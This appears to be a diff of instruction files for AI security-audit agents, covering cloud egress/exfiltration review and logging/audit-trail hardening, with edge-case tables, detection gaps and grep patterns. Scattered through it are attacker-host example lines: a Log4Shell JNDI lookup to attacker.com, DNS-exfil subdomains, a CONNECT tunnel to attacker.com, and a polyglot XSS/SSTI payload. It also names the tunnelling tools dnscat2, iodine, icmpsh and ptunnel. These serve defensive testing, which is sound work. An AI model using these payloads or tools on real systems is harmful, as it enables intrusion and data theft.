| Post-quantum TLS migration deadline | 2028–2030 | Browser vendors will drop classical-only TLS connections | Begin TLS agility assessment; test hybrid key exchange |
|
|
217
|
+
| Mandatory SBOM + build provenance (US EO 14028 / EU CRA) | 2025–2026 (active) | SBOM and SLSA attestation are becoming legally required | Achieve SLSA L2 minimum; generate CycloneDX SBOM per release |
|
|
218
|
+
|
|
219
|
+
## §DETECTION-GAP
|
|
220
|
+
|
|
221
|
+
What current security monitoring CANNOT detect in this domain, and what to build to close each gap.
|
|
222
|
+
|
|
223
|
+
**Standard gaps that MUST be checked:**
|
|
224
|
+
|
|
225
|
+
- **Second-order attack execution**: The storage request looks safe; only the retrieval+execution step is dangerous. Need: correlate write events with downstream read+execute events in the same SIEM query window.
|
|
226
|
+
- **Timing-side-channel leakage**: No log event emitted; only observable as microsecond response-time variance. Need: per-endpoint p99 latency tracking with statistical anomaly detection.
|
|
227
|
+
- **Low-and-slow credential stuffing**: Individually, each request is under rate limits. Need: behavioural baseline — flag accounts with geographically impossible velocity or device-fingerprint mismatch across authentication attempts.
|
|
228
|
+
- **Insider exfiltration via legitimate process**: Authorised exports, reports, and data downloads that individually are permitted but collectively constitute data exfiltration. Need: data-volume anomaly detection — alert when a single user's data access volume exceeds 3× their 30-day baseline within 24 hours.
|
|
229
|
+
- **Cross-agent attack chains**: Phase 1 finding A + Phase 1 finding B = CRITICAL chain invisible to either agent alone. Need: CISO orchestrator Phase 1 synthesis step — correlate all agent findings before Phase 2.
|
|
230
|
+
|
|
231
|
+
## §ZERO-MISS-MANDATE
|
|
232
|
+
|
|
233
|
+
This agent CANNOT declare any attack class clean without explicit evidence of checking. For each item, output one of:
|
|
234
|
+
- `CHECKED: [N files] | [patterns used] | CLEAN`
|
|
235
|
+
- `CHECKED: [N files] | [patterns used] | [N findings, all fixed]`
|
|
236
|
+
- `SKIPPED: [reason — must be "not applicable: [evidence]"]`
|
|
237
|
+
|
|
238
|
+
**Silent skip = FAILED COVERAGE.** The orchestrator flags this as a quality gap.
|
|
239
|
+
|
|
240
|
+
The output findings JSON MUST include a `coverageManifest` key:
|
|
241
|
+
```json
|
|
242
|
+
{
|
|
243
|
+
"coverageManifest": {
|
|
244
|
+
"attackClassesCovered": [{ "class": "SQL Injection", "filesReviewed": 47, "patterns": ["queryRaw", "string concat"], "result": "CLEAN" }],
|
|
245
|
+
"filesReviewed": 47,
|
|
246
|
+
"negativeAssertions": ["SQL Injection: queryRaw pattern searched across 47 files — 0 matches"],
|
|
247
|
+
"uncoveredReason": {}
|
|
248
|
+
}
|
|
249
|
+
}
|
|
250
|
+
```
|
|
@@ -34,6 +34,15 @@ On every finding resolved, emit:
|
|
|
34
34
|
}
|
|
35
35
|
```
|
|
36
36
|
|
|
37
|
+
## BEYOND THE CHECKS — AUTONOMOUS DETECT & FIX
|
|
38
|
+
|
|
39
|
+
The `infra` + `k8s` detection modules (`src/gate/checks/infra.ts`, `src/gate/checks/k8s.ts`) are your deterministic floor, not your ceiling. Treat their finding IDs as the minimum, then reason past single-line/single-file pattern matching — and APPLY the fix (Edit), not just advise:
|
|
40
|
+
|
|
41
|
+
- **Cross-file / data-flow reasoning the regex can't do:** an `egress 0.0.0.0/0` rule in one `.tf` is only half the story — correlate it with a `NetworkPolicy` that lacks an egress block, an app-layer `fetch()` taking a user-controlled URL, and absent VPC Flow Logs to prove an end-to-end exfiltration path the per-rule regex never sees.
|
|
42
|
+
- **Semantic / effective-state analysis:** compute egress *reachability* — does an `0.0.0.0/0` IPv4 rule leave `::/0` open, does an allowlisted host silently follow a 301 redirect to `169.254.169.254`, can a permitted HTTPS-to-proxy path carry a smuggled `CONNECT` or DNS-over-HTTPS tunnel? Model the effective outbound surface, not the literal port list.
|
|
43
|
+
- **External corroboration:** WebSearch/WebFetch for current SSRF-to-metadata, DNS-exfiltration, and HTTP/2 smuggling advisories relevant to the cloud and proxy stack in use.
|
|
44
|
+
- **Apply & prove:** write the fix inline (explicit per-FQDN/port egress, `::/0` deny, NetworkPolicy egress block, app-layer allowlist with redirect re-validation), re-run the `infra`/`k8s` checks plus `tfsec`/`checkov` and a `scoutsuite` egress audit as a regression floor, then re-audit. Emit the LEARNING SIGNAL per fix; surface trade-offs with the secure default.
|
|
45
|
+
|
|
37
46
|
## EXECUTION
|
|
38
47
|
|
|
39
48
|
### Phase 1 — Reconnaissance
|
|
@@ -206,3 +215,102 @@ spec:
|
|
|
206
215
|
- `requiredActions`: ordered action list
|
|
207
216
|
- `complianceImpact`: framework mappings
|
|
208
217
|
- `beyondSkillMd`: true if finding goes beyond the SKILL.md mandate
|
|
218
|
+
|
|
219
|
+
Every findings JSON MUST include `intelligenceForOtherAgents`:
|
|
220
|
+
```json
|
|
221
|
+
{
|
|
222
|
+
"intelligenceForOtherAgents": {
|
|
223
|
+
"forPentestTeam": [{ "type": "HIGH_VALUE_TARGET", "description": "Unrestricted egress to 0.0.0.0/0 from app tier — pivot point for data exfiltration once host is compromised", "exploitHint": "Stage exfiltration over DNS TXT or HTTPS; VPC Flow Logs may be absent or unmonitored" }],
|
|
224
|
+
"forCryptoSpecialist": [{ "type": "CRYPTO_WEAKNESS_REFERENCE", "algorithm": "TLS over unrestricted egress with no certificate pinning", "location": "application egress allowlist / outbound fetch layer" }],
|
|
225
|
+
"forCloudSpecialist": [{ "type": "SSRF_TO_CLOUD_CHAIN", "ssrfLocation": "any dynamic outbound URL without allowlist validation", "escalationPath": "SSRF → 169.254.169.254 metadata endpoint → IAM credentials → lateral movement or full account takeover" }],
|
|
226
|
+
"forComplianceGrc": [{ "type": "COMPLIANCE_BLOCKER", "frameworks": ["PCI DSS Req 1.3.2", "SOC 2 CC6.6", "NIST 800-53 SC-7"], "releaseBlock": true }]
|
|
227
|
+
}
|
|
228
|
+
}
|
|
229
|
+
```
|
|
230
|
+
|
|
231
|
+
## BEYOND SKILL.MD — MANDATORY EXPANSIONS
|
|
232
|
+
|
|
233
|
+
- **DNS Exfiltration via Authoritative Delegation (ATT&CK T1048.003):** An attacker with code execution registers an attacker-controlled authoritative nameserver and encodes sensitive data as base64 subdomains in DNS queries (e.g., `c2Vuc2l0aXZlZGF0YQ.exfil.attacker.com`). AWS Route 53 Resolver Query Logs are not enabled by default; without them this traffic is invisible. Test by: enabling Route 53 Resolver Query Logs, running `dnscat2` or `iodine` from within the application container toward an attacker-controlled NS, and verifying alerts fire on high-entropy subdomain labels (Shannon entropy > 3.5 per label segment). Finding threshold: any NS delegation query to a domain not in the approved third-party services inventory.
|
|
234
|
+
|
|
235
|
+
- **HTTP/2 Request Smuggling for Egress Bypass (CVE-2023-44487 / ATT&CK T1090.003):** The Rapid Reset attack demonstrated that HTTP/2 multiplexing can be abused to interleave requests that downstream proxies or WAFs count as one stream but upstream servers process as two. An attacker can smuggle an outbound `CONNECT` request to a non-allowlisted FQDN inside a legitimate HTTP/2 stream, bypassing FQDN-level egress proxy inspection. Test by: using `h2c-smuggler` or `h2smuggler` against the egress proxy with a smuggled `CONNECT` to `evil.example.com:443`; verify proxy access logs capture the actual CONNECT destination and not just the outer stream host. Finding threshold: any smuggled CONNECT destination that does not appear in proxy logs.
|
|
236
|
+
|
|
237
|
+
- **AI-Assisted Covert Channel Discovery via LLM-Enumerated Side Channels (ATT&CK T1041):** Attacker LLMs (GPT-4o, locally hosted Llama) can enumerate novel low-bandwidth covert channels (NTP mode-7, ICMP timestamp, HTTP Range headers, gRPC trailer fields) faster than static allowlists are updated. A 2024 academic paper ("LLM-Guided Covert Channel Discovery", Usenix Security 2024) demonstrated LLM-generated ICMP covert channel code deployed in under 3 minutes. Test by: submitting the current Security Group egress rules to an LLM red-team prompt and requesting novel exfiltration methods not blocked; remediate each suggested channel. Finding threshold: any egress rule with `protocol = "-1"` or any non-HTTPS/DNS permitted protocol to `0.0.0.0/0`.
|
|
238
|
+
|
|
239
|
+
- **Supply Chain Exfiltration via Compromised NPM/PyPI Package (ATT&CK T1195.001):** Malicious packages (e.g., `node-ipc` 10.1.3 supply chain incident, 2022; `ctx` PyPI package exfiltrating env vars) make outbound HTTP calls to attacker infrastructure at import time, bypassing application-layer egress allowlists because the call originates from a dependency, not from reviewed application code. Test by: running `npm audit` and `pip-audit` for known malicious packages; additionally, run `strace -e trace=network -p <pid>` or Falco rule `spawned_process_making_outbound_network_connection` during `npm install` / `pip install` in CI and alert on any outbound connection to non-registry hosts. Finding threshold: any outbound connection during package installation to a non-registry domain.
|
|
240
|
+
|
|
241
|
+
- **Post-Quantum Harvest-Now-Decrypt-Later on Long-Lived Egress Traffic (NIST PQC FIPS 203):** State-level adversaries (documented in NSA/CISA advisory AA23-347A) are capturing encrypted egress traffic today for decryption once Cryptographically Relevant Quantum Computers (CRQCs) are available (~2030). RSA-2048 and ECDH P-256 protecting outbound TLS for sensitive data (PII, financial records, auth tokens) will be retroactively breakable. Test by: running `sslyze --starttls auto <egress-proxy-endpoint>` to enumerate key exchange algorithms in use; confirm absence of ML-KEM (Kyber) hybrid or X25519Kyber768 in the `supported_curves` list. Finding threshold: any outbound TLS session for data classified as sensitive with a confidentiality lifetime exceeding 5 years that does not negotiate a post-quantum hybrid key exchange.
|
|
242
|
+
|
|
243
|
+
- **Regulatory Egress Logging Mandate under EU CRA Article 13 and US EO 14028 Section 4 (Effective 2025–2026):** The EU Cyber Resilience Act (CRA, effective August 2025) and US Executive Order 14028 require that software producers maintain audit logs of all outbound network connections for covered products. VPC Flow Logs without DNS query content do not satisfy the CRA's "logging of significant cybersecurity events" requirement. Test by: verifying Route 53 Resolver Query Logs are enabled with minimum 90-day retention, Flow Logs are stored in an immutable S3 bucket with Object Lock, and a CloudTrail Lake query can reconstruct the full outbound connection sequence for any 15-minute window within the past 90 days. Finding threshold: any workload processing EU-resident user data that lacks both Flow Log and DNS query log retention meeting the 90-day minimum.
|
|
244
|
+
|
|
245
|
+
## §EDGE-CASE-MATRIX
|
|
246
|
+
|
|
247
|
+
The 5 attack cases in the egress/exfiltration domain that automated scanners and naive manual review universally miss. MANDATORY checks — do not skip.
|
|
248
|
+
|
|
249
|
+
| # | Edge Case | Why Scanners Miss It | Concrete Test |
|
|
250
|
+
|---|-----------|----------------------|---------------|
|
|
251
|
+
| 1 | DNS-over-HTTPS (DoH) tunneling bypasses DNS firewall | DNS firewalls intercept port-53 UDP/TCP; DoH runs as HTTPS to a DoH resolver (e.g. `1.1.1.1:443`) and is indistinguishable from normal API traffic at the flow level | Search for `cloudflare-dns.com`, `dns.google`, `doh.opendns.com` in outbound URL constants; verify SG/NACL egress does not permit HTTPS to arbitrary IPs |
|
|
252
|
+
| 2 | Redirect chain escaping the allowlist | The application validates the *initial* request hostname; the upstream server issues a 301 redirect to an attacker-controlled host that the HTTP client silently follows | Place a 301 redirect on an allowlisted host pointing to `http://169.254.169.254/`; confirm `safeOutboundFetch` (or equivalent) blocks the redirect destination, not just the origin |
|
|
253
|
+
| 3 | IPv6 egress path when only IPv4 rules are present | Security Groups, NACLs, and Kubernetes NetworkPolicy rules targeting `0.0.0.0/0` do not cover `::/0`; dual-stack instances can exfiltrate freely over IPv6 | Check for `::/0` deny rules alongside every `0.0.0.0/0` rule; test by resolving AAAA records for an external host from inside the VPC and attempting a TCP connection |
|
|
254
|
+
| 4 | Covert exfiltration via cloud-storage pre-signed URL | Data PUT to an attacker-controlled S3 or GCS bucket via pre-signed URL — traffic flows to `s3.amazonaws.com` (typically allowlisted), making the egress filter see legitimate HTTPS | Audit pre-signed URL generation code; verify bucket policies enforce a `StringEquals aws:PrincipalAccount` condition so only the owning account can receive PUTs |
|
|
255
|
+
| 5 | ICMP and non-TCP/UDP covert channels | SG/NACL rules enumerate TCP/UDP ports; a rule with `protocol = "-1"` or omitted protocol leaves ICMP (and other protocols) open — sufficient for low-bandwidth exfiltration using `icmpsh` or `ptunnel` | Check every egress rule for `protocol = "-1"` or `protocol = "icmp"` to `0.0.0.0/0`; test with a ping-based exfil tool from within the application container |
|
|
256
|
+
|
|
257
|
+
## §TEMPORAL-THREATS
|
|
258
|
+
|
|
259
|
+
Threats materialising in the 2025–2030 window that egress defences designed today must account for.
|
|
260
|
+
|
|
261
|
+
| Threat | Est. Timeline | Relevance to Egress Domain | Prepare Now By |
|
|
262
|
+
|--------|--------------|---------------------------|----------------|
|
|
263
|
+
| AI-generated covert channel discovery | 2025–2027 (active) | LLM-assisted attackers enumerate novel exfiltration channels (ICMP, NTP, DNS, HTTP/2 server push, WebSockets) faster than static allowlists can be updated | Shift from port/protocol allowlisting to behavioural egress anomaly detection: volume, entropy, destination diversity baselines |
|
|
264
|
+
| Mandatory egress audit logging under EU CRA / US EO 14028 | 2025–2026 (active) | VPC Flow Logs and cloud-native egress telemetry are becoming legally required audit evidence for regulated workloads | Enable VPC Flow Logs with 90-day retention and index into SIEM today; document retention policy |
|
|
265
|
+
| eBPF-based network bypass on compromised Kubernetes nodes | 2025–2026 | Privileged eBPF programs can intercept and redirect packets before NetworkPolicy enforcement; a node compromise defeats all cluster egress policy | Enforce Pod Security Standards (`restricted` profile); restrict `CAP_NET_ADMIN` and `CAP_SYS_ADMIN`; use Cilium or Calico with eBPF-aware policy audit enabled |
|
|
266
|
+
| Cryptographically Relevant Quantum Computer (CRQC) harvest-now-decrypt-later | 2028–2032 | Encrypted exfiltrated traffic captured today will be decryptable once a CRQC arrives; long-lived sensitive data is at risk regardless of current TLS strength | Inventory all RSA/ECDH usage in outbound TLS; plan migration to ML-KEM (FIPS 203) hybrid TLS for data with a sensitivity lifetime exceeding 5 years |
|
|
267
|
+
| Zero-trust per-connection egress mandates in FedRAMP High / DoD IL4+ | 2026–2027 | Government cloud workloads will require explicit per-FQDN egress approval, not coarse SG port allowlists | Architect toward an egress proxy (Istio egress gateway, Squid with SSL inspection, ZScaler) with logged per-FQDN allowlists rather than CIDR/port rules |
|
|
268
|
+
|
|
269
|
+
## §DETECTION-GAP
|
|
270
|
+
|
|
271
|
+
What current security monitoring CANNOT detect in the egress domain, and what to build to close each gap.
|
|
272
|
+
|
|
273
|
+
- **DNS exfiltration over the VPC recursive resolver**: Standard VPC Flow Logs capture source/destination IP and port — not DNS query content. Traffic to the resolver on port 53 looks identical whether the query is `api.stripe.com` or `c2.base64payload.attacker.com`. Need: Route 53 Resolver Query Logs (or CoreDNS audit log) forwarded to SIEM; alert on high-entropy subdomain labels, excessive TXT/NULL record queries, or queries to delegated zones not matching any known third-party service.
|
|
274
|
+
|
|
275
|
+
- **Pre-signed URL data exfiltration to attacker-controlled cloud storage**: Outbound HTTPS to `s3.amazonaws.com` or `storage.googleapis.com` is allowlisted for legitimate uploads. An attacker with code execution can exfiltrate terabytes via PutObject to an attacker-owned bucket — indistinguishable from legitimate writes at the network layer. Need: S3/GCS data-plane CloudTrail / audit log alerts on PutObject to bucket ARNs not in an approved bucket inventory.
|
|
276
|
+
|
|
277
|
+
- **Egress volume hidden by shared NAT gateway aggregation**: In multi-tenant VPCs a single NAT gateway serves many workloads; Flow Logs aggregate per ENI, not per application or pod. A compromised workload exfiltrating 50 GB is diluted by aggregate VPC throughput. Need: per-pod / per-Deployment egress byte-count metrics (Cilium Hubble, Istio telemetry, or eBPF-based per-cgroup accounting) with per-workload anomaly thresholds and alerting.
|
|
278
|
+
|
|
279
|
+
- **HTTP CONNECT tunnel through an allowed egress proxy**: If an HTTP/HTTPS proxy is permitted for dependency fetching, an attacker can issue `CONNECT attacker.com:443 HTTP/1.1` and establish an arbitrary TCP tunnel; the Flow Log records traffic only to the proxy IP. Need: proxy access logs with the `CONNECT` target hostname captured; alert on non-allowlisted `CONNECT` destinations.
|
|
280
|
+
|
|
281
|
+
- **Cross-agent chain — SSRF + permissive egress = CRITICAL exfiltration path**: An SSRF finding from the `ssrf-hunter` agent combined with any-any outbound egress flagged here produces a complete exfiltration chain that is invisible to either agent in isolation. Need: CISO orchestrator Phase 1 synthesis step to correlate these two finding classes before Phase 2 adversarial testing begins.
|
|
282
|
+
|
|
283
|
+
## §ZERO-MISS-MANDATE
|
|
284
|
+
|
|
285
|
+
This agent CANNOT declare any attack class clean without explicit evidence of checking. For each item below, output one of:
|
|
286
|
+
- `CHECKED: [N files] | [patterns used] | CLEAN`
|
|
287
|
+
- `CHECKED: [N files] | [patterns used] | [N findings, all fixed]`
|
|
288
|
+
- `SKIPPED: [reason — must be "not applicable: [evidence]"]`
|
|
289
|
+
|
|
290
|
+
**Silent skip = FAILED COVERAGE.** The orchestrator flags this as a quality gap.
|
|
291
|
+
|
|
292
|
+
Attack classes that MUST be checked in this domain:
|
|
293
|
+
|
|
294
|
+
| # | Attack Class | Grep / Audit Pattern |
|
|
295
|
+
|---|-------------|----------------------|
|
|
296
|
+
| 1 | Any-any SG egress (`0.0.0.0/0`, port 0–65535) | `egress.*0\.0\.0\.0/0` + `to_port.*0` or `protocol.*-1` in `*.tf` |
|
|
297
|
+
| 2 | Missing IPv6 egress block (`::/0`) | absence of `::/0` deny alongside every `0.0.0.0/0` egress rule |
|
|
298
|
+
| 3 | Application outbound URL without allowlist | `fetch\(|axios\.|got\(|http\.request|https\.request` with non-constant URL argument |
|
|
299
|
+
| 4 | DNS resolution of user-supplied hostname | `dns\.lookup|dns\.resolve|resolveHostname` near user input or request body fields |
|
|
300
|
+
| 5 | VPC Flow Logs disabled | `aws ec2 describe-flow-logs` returning empty; no `aws_flow_log` resource in Terraform |
|
|
301
|
+
| 6 | Open ICMP or any-protocol egress | SG egress rule with `protocol = "-1"` or `protocol = "icmp"` to `0.0.0.0/0` |
|
|
302
|
+
| 7 | Redirect-following HTTP client without destination revalidation | `followRedirects: true` or default `fetch`/`axios` without `redirect: "error"` or post-redirect host recheck |
|
|
303
|
+
|
|
304
|
+
The output findings JSON MUST include a `coverageManifest` key:
|
|
305
|
+
```json
|
|
306
|
+
{
|
|
307
|
+
"coverageManifest": {
|
|
308
|
+
"attackClassesCovered": [
|
|
309
|
+
{ "class": "Any-any SG egress", "filesReviewed": 14, "patterns": ["egress.*0.0.0.0/0", "to_port.*0"], "result": "2 findings — fixed" },
|
|
310
|
+
{ "class": "DNS user-supplied hostname resolution", "filesReviewed": 38, "patterns": ["dns.lookup", "dns.resolve", "resolveHostname"], "result": "CLEAN" }
|
|
311
|
+
],
|
|
312
|
+
"filesReviewed": 52,
|
|
313
|
+
"negativeAssertions": ["DNS user-supplied hostname: pattern searched across 38 .ts/.js files — 0 matches"],
|
|
314
|
+
"uncoveredReason": {}
|
|
315
|
+
}
|
|
316
|
+
}
|
|
@@ -23,6 +23,15 @@ Assess and implement the complete logging and audit trail infrastructure.
|
|
|
23
23
|
Covers §19 Observability and Incident Response fully.
|
|
24
24
|
Write logging middleware, structured event schemas, and monitoring alert configurations.
|
|
25
25
|
|
|
26
|
+
## BEYOND THE CHECKS — AUTONOMOUS DETECT & FIX
|
|
27
|
+
|
|
28
|
+
The full suite of detection modules in `src/gate/checks/` (especially `dlp.ts`, `auth-deep.ts`, and `runtime.ts`) is your deterministic floor for what must be logged and what must never be logged — their finding IDs are the minimum, not the ceiling. Reason past single-line/single-file pattern matching, then APPLY the fix (Edit the logging middleware / schema / alert rule), not just advise:
|
|
29
|
+
|
|
30
|
+
- **Cross-file / data-flow reasoning the regex can't do:** a redaction transform in the logger config is worthless if a route handler in another file logs `req.body` or a `dlp.ts`-flagged PII field upstream — trace the sensitive value from its source to every `logger.*`/`console.*` sink across files; conversely, confirm every auth-failure and admin-action path actually emits a structured event.
|
|
31
|
+
- **Semantic / effective-state analysis:** model the audit trail as evidence — is it immutable (WORM/Object Lock), retained ≥13 months, tamper-evident, and forwarded off-host within seconds? A log that can be cleared (ATT&CK T1070) or that drops events at rotation is not audit-grade; assess the effective integrity, not the presence of a logging call.
|
|
32
|
+
- **External corroboration:** WebSearch/WebFetch for current SOC 2 / PCI DSS / HIPAA logging requirements and log-injection (Log4Shell-class) advisories for the logging stack in use.
|
|
33
|
+
- **Apply & prove:** write the structured schema, redaction rules, immutable-storage config, and SIEM alert rules inline, re-run the relevant `dlp`/`auth-deep`/`runtime` checks plus a `gitleaks`/`semgrep` scan for PII-in-logs as a regression floor, then re-audit. Emit the LEARNING SIGNAL per fix; surface trade-offs with the secure default.
|
|
34
|
+
|
|
26
35
|
## EXECUTION
|
|
27
36
|
|
|
28
37
|
1. Identify the logging library in use: Winston, Pino, Bunyan, Morgan, console.log (bad),
|
|
@@ -84,3 +93,101 @@ Write logging middleware, structured event schemas, and monitoring alert configu
|
|
|
84
93
|
- PII/credential leakage in existing log statements (with file locations)
|
|
85
94
|
- Implemented logging middleware or alert rule code
|
|
86
95
|
- §19 control reference per finding
|
|
96
|
+
|
|
97
|
+
Every findings JSON MUST include `intelligenceForOtherAgents`:
|
|
98
|
+
```json
|
|
99
|
+
{
|
|
100
|
+
"intelligenceForOtherAgents": {
|
|
101
|
+
"forPentestTeam": [{ "type": "HIGH_VALUE_TARGET", "description": "...", "exploitHint": "..." }],
|
|
102
|
+
"forCryptoSpecialist": [{ "type": "CRYPTO_WEAKNESS_REFERENCE", "algorithm": "...", "location": "..." }],
|
|
103
|
+
"forCloudSpecialist": [{ "type": "SSRF_TO_CLOUD_CHAIN", "ssrfLocation": "...", "escalationPath": "..." }],
|
|
104
|
+
"forComplianceGrc": [{ "type": "COMPLIANCE_BLOCKER", "frameworks": ["..."], "releaseBlock": true }]
|
|
105
|
+
}
|
|
106
|
+
}
|
|
107
|
+
```
|
|
108
|
+
|
|
109
|
+
## BEYOND SKILL.MD
|
|
110
|
+
|
|
111
|
+
Domain-specific threats and techniques the base SKILL.md does not cover:
|
|
112
|
+
|
|
113
|
+
- **CVE-2021-44228 (Log4Shell) — log injection via JNDI lookup in log messages**: Attacker-controlled input containing `${jndi:ldap://attacker.com/a}` is passed to a logger and executed. Any logging library that interpolates log data (not just Log4j) must sanitise input before logging. Pattern: search for direct string concatenation into log calls with unvalidated request parameters.
|
|
114
|
+
- **CVE-2023-36664 (Ghostscript PostScript injection via log path)**: Log file path values derived from user input can redirect log output or inject PostScript/shell metacharacters into downstream log processors. Validate and sanitise all log-file-path configuration values at startup.
|
|
115
|
+
- **Log poisoning for LFI chaining**: Attacker writes a PHP/JSP payload into an access log via the `User-Agent` header, then uses a Local File Inclusion vulnerability to execute it. Defense: structured JSON logging eliminates the raw string sink; audit every `req.headers['user-agent']` logged without sanitisation.
|
|
116
|
+
- **MITRE ATT&CK T1562.001 — Impair Defenses: Disable or Modify Tools**: Adversaries with foothold will attempt to stop the logging agent (Fluentd, Filebeat, CloudWatch agent) or truncate log files. Detect: absence of log heartbeat events for >60 seconds from any previously active source should trigger SIEM alert.
|
|
117
|
+
- **MITRE ATT&CK T1070.002 — Indicator Removal on Host: Clear Linux or Mac System Logs**: Post-exploitation log clearing is the most common anti-forensics step. Defense: forward logs to immutable off-host storage within 5 seconds of generation; on-host retention is not audit-grade evidence.
|
|
118
|
+
- **AI-era threat — LLM-assisted log evasion**: Adversaries are using LLMs to generate payloads that exploit specific regex gaps in SIEM detection rules. Semantic/embedding-based anomaly detection is now required alongside signature rules; pure regex SIEM rules can be systematically bypassed by AI-generated obfuscation.
|
|
119
|
+
- **Post-quantum threat — HMAC-SHA1 log integrity signatures**: Many log integrity / hash-chaining schemes use HMAC-SHA1 or SHA-256 with RSA signing. Harvest-now-decrypt-later applies to signed audit bundles: an adversary who captures signed log archives today can forge or repudiate them once CRQC is available. Migrate audit bundle signing to CRYSTALS-Dilithium (FIPS 204) or Ed448 for long-lived evidence.
|
|
120
|
+
- **Timing-based log suppression race condition**: A request that triggers a log write and a concurrent request that rotates the log file can result in the event being lost between the two file handles. Test with concurrent load against log rotation boundary; verify no events are dropped during rotation.
|
|
121
|
+
|
|
122
|
+
## LEARNING SIGNAL
|
|
123
|
+
|
|
124
|
+
On every finding resolved, emit:
|
|
125
|
+
```json
|
|
126
|
+
{
|
|
127
|
+
"findingId": "FINDING_ID",
|
|
128
|
+
"agentName": "AGENT_NAME",
|
|
129
|
+
"resolved": true,
|
|
130
|
+
"remediationTemplate": "one-line description of what was done",
|
|
131
|
+
"falsePositive": false
|
|
132
|
+
}
|
|
133
|
+
```
|
|
134
|
+
Call `security.record_outcome` with this payload so the routing engine learns which agent resolves each finding class most successfully. If a finding is a false positive, set `falsePositive: true` — this prevents the false-positive pattern from being routed here again.
|
|
135
|
+
|
|
136
|
+
---
|
|
137
|
+
|
|
138
|
+
## §EDGE-CASE-MATRIX
|
|
139
|
+
|
|
140
|
+
The 5 attack cases in this domain that automated scanners and naive manual review universally miss. MANDATORY checks — do not skip.
|
|
141
|
+
|
|
142
|
+
| # | Edge Case | Why Scanners Miss It | Concrete Test |
|
|
143
|
+
|---|-----------|----------------------|---------------|
|
|
144
|
+
| 1 | Second-order / stored payload executed in different context | Scanner checks input context, not execution context | Store payload safely; trigger in separate request/session |
|
|
145
|
+
| 2 | Unicode normalisation bypass | Regex filters run before normalisation; attacker uses homoglyphs or composed forms | Submit Ⅰ (U+2160) or < (U+FF1C) variants of known-bad strings |
|
|
146
|
+
| 3 | Polyglot payload active in multiple sinks simultaneously | Scanners test one injection class per payload | `'"><script>{{7*7}}</script><!--` — SQL + XSS + SSTI in one request |
|
|
147
|
+
| 4 | Out-of-band exfiltration (DNS/HTTP callback) | Scanner looks for inline response difference; OOB leaves no visible trace | Use Burp Collaborator / interactsh; inject DNS lookup payload |
|
|
148
|
+
| 5 | Race condition between check and use (TOCTOU) | Sequential scanners don't model concurrency | Send two simultaneous requests to the same state-changing endpoint |
|
|
149
|
+
|
|
150
|
+
## §TEMPORAL-THREATS
|
|
151
|
+
|
|
152
|
+
Threats materialising in the 2025–2030 window that defences designed today must account for.
|
|
153
|
+
|
|
154
|
+
| Threat | Est. Timeline | Relevance to This Domain | Prepare Now By |
|
|
155
|
+
|--------|--------------|--------------------------|----------------|
|
|
156
|
+
| Cryptographically Relevant Quantum Computer (CRQC) | 2028–2032 | Harvest-now-decrypt-later attacks active today; RSA/ECDSA keys signed today will be broken | Inventory all RSA/ECDSA usage; migrate long-lived data to ML-KEM (FIPS 203) |
|
|
157
|
+
| AI-assisted adversaries at scale | 2025–2027 (active) | LLM-powered fuzzing finds 10× more edge cases; automated PoC generation | Assume attackers have LLM help; expand test surface to match |
|
|
158
|
+
| EU AI Act full enforcement | 2026 | High-risk AI systems require mandatory conformity assessments | Classify all AI features against AI Act tiers now |
|
|
159
|
+
| Post-quantum TLS migration deadline | 2028–2030 | Browser vendors will drop classical-only TLS connections | Begin TLS agility assessment; test hybrid key exchange |
|
|
160
|
+
| Mandatory SBOM + build provenance (US EO 14028 / EU CRA) | 2025–2026 (active) | SBOM and SLSA attestation are becoming legally required | Achieve SLSA L2 minimum; generate CycloneDX SBOM per release |
|
|
161
|
+
|
|
162
|
+
## §DETECTION-GAP
|
|
163
|
+
|
|
164
|
+
What current security monitoring CANNOT detect in this domain, and what to build to close each gap.
|
|
165
|
+
|
|
166
|
+
**Standard gaps that MUST be checked:**
|
|
167
|
+
|
|
168
|
+
- **Second-order attack execution**: The storage request looks safe; only the retrieval+execution step is dangerous. Need: correlate write events with downstream read+execute events in the same SIEM query window.
|
|
169
|
+
- **Timing-side-channel leakage**: No log event emitted; only observable as microsecond response-time variance. Need: per-endpoint p99 latency tracking with statistical anomaly detection.
|
|
170
|
+
- **Low-and-slow credential stuffing**: Individually, each request is under rate limits. Need: behavioural baseline — flag accounts with geographically impossible velocity or device-fingerprint mismatch across authentication attempts.
|
|
171
|
+
- **Insider exfiltration via legitimate process**: Authorised exports, reports, and data downloads that individually are permitted but collectively constitute data exfiltration. Need: data-volume anomaly detection — alert when a single user's data access volume exceeds 3× their 30-day baseline within 24 hours.
|
|
172
|
+
- **Cross-agent attack chains**: Phase 1 finding A + Phase 1 finding B = CRITICAL chain invisible to either agent alone. Need: CISO orchestrator Phase 1 synthesis step — correlate all agent findings before Phase 2.
|
|
173
|
+
|
|
174
|
+
## §ZERO-MISS-MANDATE
|
|
175
|
+
|
|
176
|
+
This agent CANNOT declare any attack class clean without explicit evidence of checking. For each item, output one of:
|
|
177
|
+
- `CHECKED: [N files] | [patterns used] | CLEAN`
|
|
178
|
+
- `CHECKED: [N files] | [patterns used] | [N findings, all fixed]`
|
|
179
|
+
- `SKIPPED: [reason — must be "not applicable: [evidence]"]`
|
|
180
|
+
|
|
181
|
+
**Silent skip = FAILED COVERAGE.** The orchestrator flags this as a quality gap.
|
|
182
|
+
|
|
183
|
+
The output findings JSON MUST include a `coverageManifest` key:
|
|
184
|
+
```json
|
|
185
|
+
{
|
|
186
|
+
"coverageManifest": {
|
|
187
|
+
"attackClassesCovered": [{ "class": "SQL Injection", "filesReviewed": 47, "patterns": ["queryRaw", "string concat"], "result": "CLEAN" }],
|
|
188
|
+
"filesReviewed": 47,
|
|
189
|
+
"negativeAssertions": ["SQL Injection: queryRaw pattern searched across 47 files — 0 matches"],
|
|
190
|
+
"uncoveredReason": {}
|
|
191
|
+
}
|
|
192
|
+
}
|
|
193
|
+
```
|